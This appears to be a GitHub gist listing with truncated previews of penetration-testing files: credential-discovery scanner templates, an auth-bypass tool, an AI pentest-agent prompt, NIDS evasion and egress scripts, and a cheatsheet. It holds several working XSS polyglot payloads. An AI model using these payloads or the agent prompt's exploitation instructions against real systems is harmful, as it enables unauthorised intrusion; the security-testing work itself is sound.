nullenc0de
nullenc0de
/ aws.yaml
Last active
June 6, 2025 17:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: aws-iam-privilege-escalation | |
| info: | |
| name: AWS IAM Privilege Escalation Vectors | |
| author: nullenc0de | |
| severity: critical | |
| description: | | |
| Detects AWS IAM policies, credentials, metadata, and configurations that allow privilege escalation paths. | |
| Covers exposed credentials, overly permissive IAM policies, misconfigured metadata services, vulnerable role assumptions, and user-data scripts. | |
| reference: |
nullenc0de
/ huge_config.yaml
Created
June 3, 2025 13:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: sensitive-credential-files | |
| info: | |
| name: Sensitive Credential File Discovery | |
| author: security-researcher | |
| severity: high | |
| description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | |
| cvss-score: 7.5 |
nullenc0de
/ config.yaml
Last active
June 2, 2025 23:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: sensitive-credential-files | |
| info: | |
| name: Sensitive Credential File Discovery | |
| author: nullenc0de | |
| severity: high | |
| description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | |
| cvss-score: 7.5 |
nullenc0de
/ wrong-method-detection.yaml
Created
May 23, 2025 16:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: wrong-method-detection | |
| info: | |
| name: HTTP Method and Authentication Misconfiguration Detector | |
| author: yourmom | |
| severity: medium | |
| description: | | |
| Identifies endpoints rejecting GET requests with HTTP 405 errors and verifies if | |
| the allowed method (from Allow header) works without authentication. | |
| reference: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Authentication Bypass Automation Tool v4 | |
| Further false positive reduction | |
| - Better HTML vs API response detection | |
| - Improved JavaScript code filtering | |
| - Skip logout endpoints | |
| - Enhanced credential pattern validation | |
| """ |
nullenc0de
/ external_pentest.yaml
Created
April 7, 2025 20:56
nerve run external.yaml --target "example.com"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| agent: > | |
| You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`. | |
| ## Instructions | |
| - Target external assets specified via {{ target }} (e.g., public IPs, domains). | |
| - Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation. | |
| - Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed. | |
| - Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses). | |
| - Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions. | |
| - Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut |
nullenc0de
/ xss
Created
March 27, 2025 16:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> | |
| javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
| 1</Script/><Svg/OnLoad=(confirm)(1)> | |
| 1"<!--><Svg OnLoad=(confirm)(1)<!-- | |
| 1</Script/><Svg/OnLoad%0A=(confirm)(1)> | |
| "'-->confirm`xss`<%2FScript><Script%2F1%3D' | |
| '"--></style></scRipt><scRipt>alert(1)</scRipt> |
nullenc0de
/ gist:a076a1a2ba01d7bedebf9ea57acf243f
Created
February 19, 2025 03:12
Egress_segment.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Colors for output | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| YELLOW='\033[1;33m' | |
| BLUE='\033[0;34m' | |
| NC='\033[0m' | |
| # Function to discover networks |
nullenc0de
/ kali_nids_evasion.sh
Last active
February 18, 2025 21:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Filename: kali_nids_evasion.sh | |
| # Focus: Host behavior obfuscation without MAC modification | |
| # Requires root privileges | |
| # Check for root privileges | |
| if [[ $EUID -ne 0 ]]; then | |
| echo "This script must be run as root" | |
| exit 1 | |
| fi |
nullenc0de
/ External Penetration Testing Commands
Last active
January 29, 2025 17:04
External Penetration Testing Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # External Penetration Testing Cheatsheet | |
| ## 1. Reconnaissance | |
| ### Cloud Enumeration | |
| # Cloud Infrastructure Discovery | |
| ./cloud_enum.py -k somecompany | |
| # Third Party Misconfigurations |
NewerOlder